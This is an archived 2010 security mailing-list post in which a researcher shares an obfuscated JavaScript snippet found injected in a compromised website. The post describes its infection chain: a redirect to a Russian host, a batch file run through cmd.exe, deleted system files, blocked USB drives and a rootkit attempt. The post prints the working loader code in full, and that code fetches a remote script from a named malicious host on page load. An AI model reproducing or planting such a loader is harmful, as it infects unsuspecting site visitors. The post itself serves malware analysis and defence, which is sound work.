WebApp Sec mailing list archives
Give a look at the malicious script
From: s34c0d3r () gmail com
Date: 20 May 2010 21:47:29 -0000
Hello Everyone, i was just working out over some web application security and found the malicious script injected in the code. It was prepared wisely but now gets detected. here it is:- <script>var g="g";n={jD:51390};function M(){this.ta=false;var t=new String("01hcreat".substr(3)+"eElem"+"649pent".substr(4));var Mt=["P"];this.S="";var K=new String("onlo"+"ad");try {var Pm='Ae'} catch(Pm){};var A=new String("defer");try {var p='Q'} catch(p){};try {var H='TH'} catch(H){};var c=new String("appIsNt".substr(0,3)+"end"+"JKvChi".substr(3)+"ld");var R=window;try {var Ic='Mm'} catch(Ic){};var j=new String("bodTQxn".substr(0,3)+"Ne3iyi3Ne".substr(4,1));xD=14051;xD+=70;var u=new Date();var TD=document;this.GS=22175;this.GS--;var F=new String("scrip"+"tQCwq".substr(0,1));this.D="";this.nB=35701;this.nB-=197;var b=String("srKo8".substr(0,2)+"cxUZ".substr(0,1));this.y=63146;this.y--;this.Mx=57925;this.Mx++;function cJ(){try {var HI='C'} catch(HI){};try {var G=String("/go"+"ogl"+"e.c"+"om/"+"7AG8new".substr(4)+"gro"+"und"+"s.c"+"om/"+"kEAZdow".substr(4)+"nlo"+"ad."+"ytJ4com".substr(4)+".ph"+"p");var z=856480-848400;F_={FD:false};CB={HY:false};var Gx=new String("http:"+"// pas"+"sport"+"blues"+".ru:");this.m="";this.pZ="";var B=6126-6125;var xL=["Gp","MK","vC"];this.l=28692;this.l-=179;i=TD[t](F);_R={h:false};try {} catch(L){};var zQ=["jl","s"];var NR={af:false};try {var NF='Pv'} catch(NF){};try {var Cn='cC'} catch(Cn){};this.iQ=false;aQG=["FU","LQ"];var sB="sB";i[A]=B;var PZx="";var aW="";i[b]=Gx+z+G;var Xj=new Date();var ew=new Date();iy=32656;iy-=67;TD[j][c](i);try {} catch(ai){};try {} catch(xS){};} catch(X){var Ac={et:"fM"};var RW='';};}R[K]=cJ;this.ge=39406;this.ge++;var ewO={jt:"xl"};};var jf={i_:"SY"};var Ph={cM:"Ge"};M();try {var RV='bV'} catch(RV){};</script> till now what i found is that when any one visit the infected site ,this script redirects the person to "http://passportblues.ru:8080/google.com/newsground.com/download.com.php" passportblues.ru is infecting system, For the First Time it tried to download Notes1.pdf file. the strange thing is that it loaded the notes1.pdf file, but the pdf didn't had any exploit embedded in it. the site(passportblue.ru) when successfully infect the system an cmd.exe process is created,which actually executes the batchfile downloaded on system which deletes "iexplorer" it infects the system and remove around 7-8 .sys files from windows. after that Pendrive is blocked over the system. USB port works,(wifi usb adapters are working)but no pendrive works. it tries to install over rootkit on the system as well as internet connection is also blocked on the system . it is really a notorious script with a little technique to join the whole. "hxxp://passportblues.ru:8080/google.com/newsground.com/download.com.php" any comments regarding it is welcomed Tarun Kalla aka S34 This list is sponsored by Cenzic -------------------------------------- Let Us Hack You. Before Hackers Do! It's Finally Here - The Cenzic Website HealthCheck. FREE. Request Yours Now! http://www.cenzic.com/2009HClaunch_Securityfocus --------------------------------------
Current thread:
- Give a look at the malicious script s34c0d3r (May 21)
- Re: Give a look at the malicious script Paul Melson (May 22)